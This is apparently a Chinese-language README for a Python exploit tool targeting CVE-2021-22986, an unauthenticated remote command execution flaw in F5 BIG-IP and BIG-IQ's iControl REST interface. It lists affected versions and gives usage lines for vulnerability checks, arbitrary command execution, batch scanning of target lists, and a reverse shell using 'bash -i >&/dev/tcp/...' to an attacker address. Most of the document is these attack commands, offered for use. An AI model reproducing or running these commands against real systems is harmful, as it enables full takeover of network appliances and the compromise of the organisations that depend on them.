自述文件
此漏洞允许未经身份验证的攻击者通过BIG-IP管理界面和自身IP地址访问iControl REST接口,从而可以执行任意系统命令,创建或删除文件以及禁用服务。此漏洞只能通过控制平面利用,而不能通过数据平面利用。剥削可能导致完全的系统危害。设备模式下的BIG-IP系统也容易受到攻击。
影响产品
-
F5 BIG-IQ 6.0.0-6.1.0
-
F5 BIG-IQ 7.0.0-7.0.0.1
-
F5 BIG-IQ 7.1.0-7.1.0.2
-
F5 BIG-IP 12.1.0-12.1.5.2
-
F5 BIG-IP 13.1.0-13.1.3.5
-
F5 BIG-IP 14.1.0-14.1.3.1
-
F5 BIG-IP 15.1.0-15.1.2
-
F5大IP 16.0.0-16.0.1
Vunl Check
基本用法
python3 CVE_2021_22986.py
外部扫描
python3 CVE_2021_22986.py -v true -u https://192.168.174.164
命令执行:
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c id
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c whoami
批量扫描
python3 CVE_2021_22986.py -s true -f check.txt
备用壳
python3 CVE_2021_22986.py -r true -u https://192.168.174.164 -c "bash -i >&/dev/tcp/192.168.174.129/8888 0>&1"
新POC
python3 newpoc.py https://192.168.174.164
参考
-
https://support.f5.com/csp/article/K03009991
-
https://github.com/safesword/F5_RCE
-
https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986